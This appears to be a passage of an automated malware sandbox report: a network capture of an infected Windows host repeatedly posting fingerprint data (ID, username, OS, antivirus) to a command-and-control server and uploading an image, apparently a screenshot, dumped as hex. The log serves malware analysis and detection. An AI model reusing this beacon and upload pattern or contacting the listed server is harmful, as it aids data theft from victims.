                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          231176.111.174.11480192.168.2.449884C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.220776081 CEST6701INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          232192.168.2.449885176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.437123060 CEST6701OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          233176.111.174.11480192.168.2.449885C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.540241003 CEST6702INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          234192.168.2.449886176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.752851963 CEST6702OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          235176.111.174.11480192.168.2.449886C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:47.856725931 CEST6703INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:47 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          236192.168.2.449887176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.067327023 CEST6706OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          237176.111.174.11480192.168.2.449887C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.164905071 CEST6707INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          238192.168.2.449888176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.377612114 CEST6709OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          239192.168.2.449889176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.441199064 CEST6723OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 2f 7f 97 bb 6e e6 db 9c 64 e3 35 ef 70 ff 00 19 70 df 13 d5 9d 3c b2 bf b4 94 12 6f dd 9c 6c 9e 9f 6a 31 fc 0f 3b 31 c9 73 3c ae 2a 58 aa 7c a9 e8 b5 8b fc 9b 38 a7 39 38 a1 36 7f 1d 39 d1 b3 9a 65 7d 49 e5 0e 65 fe e5 21 56 5e a2 92 9d bc d0 1b 11 f9 7e f4 2a f7 34 f7 eb 5f af bf f0 6e 6f fc 12 17 f6 1d ff 00 82 90 7e cd
                                                                                                                                          Data Ascii: --152138533219.jpgContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-streamJFIFCC"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?P/.Rw\5\iGzu{S;/VeOPH<Q+rCOpV0&8"]|J\(I5gmXh(V)j}cxoZ|/{.+<I]n1'"P)y-X&$}*?=&vW>EUEvg_kByYY7;8<\[o]esE?)rvWDK'jnbMND>~4|7u{t.>e_*|o9j"-+*+)OfoV}d8KeCOC?TSWN.)kDX'ZuQkgw-o/nd5pp<olj1;1s<*X|89869e}Ie!V^~*4_no~>K-[R9t/w6_gcmA~r 9qXxJ^w<MNH~@C5|\>;$62>x}<uw5oa?_r3#~?/Oz_W<Cu3V2m yXZW_x[[B$)! zLml[aj3\snV&L3y{NijJ*@79>,?gzWMeYo#'u+$L\A @oO-OU*:N3Z1R_cH^8k,,4;DO|S_s}2`$16T9seb;M_PO''wK`U!cruS|&:n`t)P#DwZZi716ikp|&Tl5CFUeSo+lKJ%y4J+_|GYuYJVsTWU8w]|e*qV8%%uzNkEV~pW^:oN*nQv|XIG(EA{WqGWZLZl*Wtd1NBAWU.G>_9'NvZa2ZJ=xS15$2U=OKt]Bm'WCUayg(~WR)Ttvi[46t6`K}4rm6>cJQsZfV|<9C474$Z9XKzu*U{b8a1HvOah((RQZ];SBzu5e:dQEN5BL3'Z:lW)vQE@w_JJc)=irSN:)i%4}ER?ORQ@u%GXD?k:k$QFhzAS:c679Z*G(*dRTt(((@QE@q'vK(dMzoz6(;RIfh((-R?W$:~4*}Y;R'f1>>((v$GAZy4-JP'ZPvU"e<ayk=h8'li_1xO.t&sv%^dz|D<OHOr;Y.VD8ud|7~g=|C)$(38Ri)J9Ji?yD2!g'YB7^tz{ii2N]RYoLU|wtzyK$c\N+#[?pbd ,mp3g+zE,VUVMuM;4}4S~x['VaQ`v1ER1'+!_EdK& [;R%s:{"z7M<zY:H+9nm58?}W\^ip]{NbL\gyVqff|Q(X.pJS<B>;(U:L*QnVO]5?Q!a(Gz'WIXQI9Ez#B MJ5OJsK+{^'_[> x7:yke]hxj?>xXeZ'<|Mxn/L^%z4:3<>LYU;3/<Z/b>c^YIl2bK<ueAUtQT7+siqpWtY+SI&zz47~]vv^i~-:_&[K6B{?)*/4BK;x%_5YEq>6EHD4Z?Zz}]$-u`rT_RY51tO%p8-Sm\jsm]_su_U:*qp~ROp((q~n#s'//4V&6w*M3< +{Hz?T|Jo{}?L~xVP_@&lm*u1M5{6(vJJxzqSRNJISkmrz&Q_:L.h:v/-u7QgBLs??k}gt47+oRiPc$4m;c;_Wx7A>C%u534d`osV VIu,f_7VeevK+IgYfyAUsp_M]'N\uo8_?v[~'44Y&h#.~NrN?]/K:u0+KhkR4(VZ,Lh0[]G->O:>W?:3XeKIgp8KKgh_o~~'wh7q"\M-TZ2R9FX)mo(KT~;Eo,n]mL#V~%|%mOx,=:|jsy#s.[-SS%Q\E6wsEW4z>!nt{L$S#H$x ?i7m'Px;JKOkWcqa7q4Fq?iK/P3]iVb.2Y@#$P9FWIupo3=*r:rT7N1J.:+E-X~SwB.oXyq"_.y~e}P?b|+-kKGZu<C("mr18DW\S<{3oir**G/T.aTe^D*]!l>_M@]ThJZQEaEU$)(Q@QUvi@%GN:}}5:6V}0;ROOiN*Xrz$H(jb=eL3!6qQId6t}RP)#tb"R1]%JoK((MdMOSRQQ"M%Sq+DM9CI>%:>I@QAQEQEaA?[QE@Q@_X}GiNUISHSdHzNt0;$UjM<zRy#E5Wu%*}XKOOs"?/zU]WtN.f}Ph?|2O2Gq\{y_wxs64-c4STc(W!@lO5xC.ej,pZJ;*'+%#osW|:yH5W^QMTURVm+=LjrQRHFjqwI?ox&d!X^-8>^x^/goTu=Y?n_r?#_?\2EQVY%ov='eU,-j+$7M&<J&qLX_I_ghCig&{4}o/w2vy*Ky@5H;6x^z2zWs3wSahz\t[BGRC|c_2Jcl<YW_'3w(`*?yB.N>1RV0RZsI+]G:3#cW%x""'%'iO2tvGJ+pV1R6(j>4|@>$tzMn]L'8I;A><]VJPnTMSF'5%dm_Jru?*Gg[~CWG'jH!k)DjVL?Zz?SR.^6uQ_&|?0\hZk,t-$UH]|VTk^&<]u-6u,y x7"#r?cq5/gtA?@_9<+mZ/k[@-b'NsM],2'=x?5YS7+@SAms&[u9UKe:7_x7[[Kn;H%b03?+>=<8;x{;I>i6m;$'/2PJM4X6R4jx"OgQNi@_/I3O_]>>TFwm~Y:2t{!GoI<#~L?_<aCOPRikiX=\99S*;s{IWd0sG5mi+]Scoqqgq8x09 ~nx[?l;1"D/Yx.}o_?s_W_c|Q0<x=c%iE;'n>/ArE2VQwW|9s|=tJuzv<;ss6U4D!UU.U$*tV"zU$GB)qO+2///k!#>2xHxJ#j_X'c5%qfe{'/t55]+[fa]{0GO&?g[|IErG]#EAMlFAy\33?SdB|:~|6K}]:OqZ"B"k$nQcWW\=iUtZt?N.L-*,ndj-)&>UN,avAv1iM6 HmWa_[C^_4M~_X6R.t6[H&f^%pv$i,`}28b"\+>NK_srC!:\t#c&n1_W9S/7A#1oL*x5ARy~73ul4KLzmNfcN~)_#Ry($(QN_w>#KXhx/e%7}HDAZ6j"&9QE;co3.$-PD'Zu6>:>*DNdM*H?ZD)=*V]K8O|P?yA};!|/)\heIR5~S>qQ4DO&NvXH;vYs2:MRl(2 OeI6'j'j$=HiEH)vDi67>P#'j0E<C.y.9'O(%GRhQEQEfEPQ`(S_:czRQ@)(t}S@Q@S-QEaEPEPEP$F'?ZOoCNu^4<sW[,r["jn_i+sm?Iu3{Fo>qo~|Zy#z/>/rB) e8j,k.t/pY=gWa0xqJXsP!!mMi$OQO|[/~;RxBd hc ,UX)<Vd}Z}>[Y'%YrTdyB#]tw}s1*o}lC/Wuwe;VAniduOD;||w_+)W[[I-i\[B\ocUK~Ow0uM";g\GHBMpk_b+M_WxlL{gZiwjp?5|Y<#;76<OaiW\$*@O5wd8Bis^m,k2_^~1,ibVs.g$X&|Z,o!q_s%vs$P$ljUF0j*\4z6mYn;c^IW4U{%:o&pxi^=oBq( |JVmm~^qsk6OM<LwNC|dhrZxzmT/si}{y,YEmt$yOE)e8jY_EF3Ii~YJo\Z$ub!J0.TOJIul+LO^~ZuihC|qVXAuY}-KMH%n!h">WS~oxN4<v,K"/lZY4V-eMpy+}tQJM;j1;+&MYkt3(a-?Gxti+hWR}:'Z<ER>U>xCZ-q'](jYG60,HfM5MsI+mnTe3X\r(6+{k>h2ozxcW> *mo#]om`m5_|1X|sWw^H$s5UKQ!Uj4Ta&6VZoo'q*UDVu?{U<DhNwyAbH"_f%2|62'cQ|1dz^xzsk:O-k!PX4+Hc#"S['4\<!])mD^[G%dX. JFcwwzN&UdZW,cv/MWW[4x?FCc:~u |[K0?<m!xjo-R{!YmvYgk~$7.$YqusoalQTdPm5KhRZ3qR;4>o<K=_)7)1qMu+Ntp@rr<s"e]>|9au'vB+~|KcetG9[R_7M-%k>4ceZt(Cj1,YO(}wqZkgW5HVI^fu}]fy#zWkOx{V1=]j0^-\[LK+#%Q&VO>xW_#d]2IId'cu/++vw\YJik3Ag,>xks{z^l,./$O16`Gls?/l5>2?+/cxK-.}vCvMcKbERUcJR~k}~WmVQ6w9c/(5jI0Gq'UP\>?x?g?5_'gGsH<'KJ}^\Eo6riR`bQHFkuN6xS]c[\4hjUHJA >N6Q'JMJIk"Wm-zIv}"_3aoM?x%3'_Ww5[xtok4Iv-\K24i2$}8t9~,<;Y<Es3ko5YURdq6wVJ:jw}U|-no]_So)9K/~>>3^QT{%ImRHf9 cGW|9(T)-!H>dkZQ*n%EFNo_/:X~w;iE{H.nI)<_*+E+YUHrn1ktkZ?u+gS5]q.n]B9,YgPW,<&
                                                                                                                                          Apr 28, 2021 22:59:48.540994883 CEST6730OUTData Raw: 56 ff 00 77 14 95 00 2a 7d ea 7d 31 3a d3 eb 40 1e 9f 76 9f 1f 7a 8e 3e f4 ea b8 99 92 a7 5a 97 9d 95 5e 3e f5 35 6a 65 2d 87 47 de 9d 51 d3 93 ad 04 0e a2 91 fa 7e 34 b4 e3 f1 00 53 bf e5 9d 1f f2 ce 97 e7 f6 ad cc c4 fd e5 07 7f ff 00 aa 9d 45
                                                                                                                                          Data Ascii: Vw*}}1:@vz>Z^>5je-GQ~4SE7YihL=Z(cD2G.|e"0?Z%@rbORg8\~)*JF0s~NJP#E?ftmG*/+R<M*mczT<z?ZM1(+I
                                                                                                                                          Apr 28, 2021 22:59:48.541295052 CEST6733OUTData Raw: bf e5 4d aa 33 1d 27 6a 75 36 3e f4 49 da 80 1b 49 dd 69 68 dd b7 9c d4 cb 73 40 a9 2a 20 db b9 a7 c7 de 88 93 22 54 fb b4 b5 14 5f eb 2a 5a a3 39 08 ff 00 76 99 4f 7f bb 4c a0 71 d8 8e 9c 9d 68 e7 7d 23 fd ea 06 0c db a9 63 ef 44 9d a8 93 b5 00
                                                                                                                                          Data Ascii: M3'ju6>IIihs@* "T_*Z9vOLqh}#cD"}}GRPM:'jmMz>>%zi}uOA.:QA$s)|jQc6#$S]h4y"n1KTGg_T.r/Nb:)
                                                                                                                                          Apr 28, 2021 22:59:48.541488886 CEST6736OUTData Raw: 0b 99 11 d4 94 52 95 2b ce 68 17 30 c7 4f 32 a3 fb 37 b5 49 1f 7a 75 05 7b c5 67 89 e3 a4 1f ee 55 bd 85 87 4a 3c 95 a9 f6 61 ed 11 4d 87 cd 81 de 97 cb ff 00 a6 55 66 4b 5a 64 90 ed 14 bd 9b 2b da 15 f6 7f b3 fa 52 49 0e ee b5 3f 94 fe 94 61 fd
                                                                                                                                          Data Ascii: R+h0O27Izu{gUJ<aMUfKZd+RI?a:fW9U"zUKdA/jEgW1[bRy~ch^|0*iu>rI1')__O)|MRT)O,vnrNN5\ToHb*JCe
                                                                                                                                          Apr 28, 2021 22:59:48.541583061 CEST6738OUTData Raw: f9 f0 8f f6 66 fd bf f5 ff 00 84 ff 00 04 fc 24 ba 2e 81 a6 ad aa d9 d9 7d ae 5b 86 45 93 4c b0 b8 60 65 99 de 47 fd e4 f2 91 b9 8e 37 60 70 05 7e d2 7e c3 ff 00 b6 2f fc 2d 4f da 8b c3 1e 02 ff 00 87 c9 ff 00 c2 d6 fb 7f db 7f e2 81 ff 00 86 78
                                                                                                                                          Data Ascii: f$.}[EL`eG7`p~~/-Oxe<N:R4,*(.kTM}}nz(5yc((~$}:'ju=:~46zD8AQU*_
                                                                                                                                          Apr 28, 2021 22:59:48.541855097 CEST6741OUTData Raw: e2 a9 aa 7b ab 6e a5 7e 6e 6d 57 c4 a5 ef 5d f5 dc fe 6a 87 0d f8 93 1c d1 63 de 16 a3 a9 6b 3b db 58 db 97 97 47 f0 b8 fb b6 5d 0f 42 ff 00 82 6c fe d8 5e 29 f1 cf 8e 3e 15 fe c6 9f 16 16 69 7c 47 e0 0f 88 17 cf a5 5e 16 f3 37 e9 d0 f8 7b 5b 81
                                                                                                                                          Data Ascii: {n~nmW]jck;XG]Bl^)>i|G^7{[w$h4l$mG?VW'zC?XxS_"InuKnXKaqmELg:8O!-8Lq7JTeNg\C>Jy%8(AF
                                                                                                                                          Apr 28, 2021 22:59:48.542200089 CEST6746OUTData Raw: a5 4f b0 d4 7e 5f bd 5f 2b 27 98 6d 2e d3 8c d3 d5 01 3c 53 bc bf 7a 5c a4 f3 11 6c 3e 94 04 39 fb b5 2f 97 ef 47 97 ef 4f 94 39 88 dd 09 fe 1a 36 1a 95 a1 4c ff 00 85 27 d9 bd a9 72 87 31 1f 97 ef 47 97 ef 53 79 1e f4 92 47 e5 d3 e5 61 cc 8a ec
                                                                                                                                          Data Ascii: O~__+'m.<Sz\l>9/GO96L'r1GSyGa>SQG++2rNj9GCT_&b!eI<1GSI79zO%jzn9C%E^eL^|hZMP<aS3czT{3XJmN2H
                                                                                                                                          Apr 28, 2021 22:59:48.542489052 CEST6749OUTData Raw: cb d6 a6 65 db de 92 a3 94 d3 98 87 ca 7f 4a 6b c7 dc d4 df bc a6 49 bf 15 9f 29 5c c4 5b 0d 35 e3 f5 a9 28 a9 2f 99 11 79 5e c6 a5 55 fd de 4d 15 22 8f dd e6 a7 94 52 91 03 47 f8 d4 7e 57 b0 ab 2b 1f ad 12 0c 35 69 ca 38 c8 a3 24 7f 35 15 34 d1
                                                                                                                                          Data Ascii: eJkI)\[5(/y^UM"RG~W+5i8$546zM"iyNR0'j^THSh~+GKDLU1sl_J6/KQaex{]vc?izVzuWj;f}jz~3#mn;{Ql-*e
                                                                                                                                          Apr 28, 2021 22:59:48.543080091 CEST6752OUTData Raw: dd b2 5c c1 20 0f 04 92 5b 4b 14 c1 1c 06 d9 2a 31 00 32 93 e3 5f f0 9c 7c 4d 1f 0b 9f e0 62 7c 56 f1 30 f0 34 9a bf f6 ac 9e 0b 1a ed c7 f6 53 5f ec 09 f6 b3 69 bf c9 33 6d 01 7c cd 9b b0 31 9c 56 35 96 95 65 a7 92 6d a2 c1 3d ea e3 94 e2 e7 98
                                                                                                                                          Data Ascii: \ [K*12_|Mb|V04S_i3m|1V5em=9$je5\zI]yMJJ%ed(~wS#x2~'kk)uI4J$k}sx]MV70Q]~N[<|u
                                                                                                                                          Apr 28, 2021 22:59:48.640556097 CEST6757OUTData Raw: cf e6 5e 9c f1 56 25 d3 a5 85 80 09 9c 74 15 ea 65 b9 46 2b 01 5a ac e7 3b a9 b6 d2 e8 9b 94 a4 ff 00 f4 a5 1d 2d a4 57 5b b7 e5 e3 b3 4c 2e 36 95 38 42 3a c5 5a ef 76 94 63 15 eb f0 f3 36 fe d4 a5 b2 b2 55 e9 b1 f7 a9 9a de 6e a5 29 16 37 cf dc
                                                                                                                                          Data Ascii: ^V%teF+Z;-W[L.68B:Zvc6Un)7[yTZ?Z>\rJTMt}^S.a?H*Ty;rAOXjjXB*~etrs]P7JY#o:`3"U&9/)<9/SRy^h#
                                                                                                                                          Apr 28, 2021 22:59:48.640656948 CEST6765OUTData Raw: a7 09 3d 0d fd 36 5e 80 57 f2 c3 ff 00 05 0e 55 5f db fb e3 9a a2 80 07 c6 1f 13 00 00 e0 0f ed 5b 9a fe a5 74 a9 72 06 6b f9 6a ff 00 82 87 73 fb 7f 7c 72 3f f5 58 7c 4d ff 00 a7 5b 9a fd bb e8 f1 2b e6 f8 df fa f7 1f fd 28 fc f3 c4 c5 6c 1d 0f
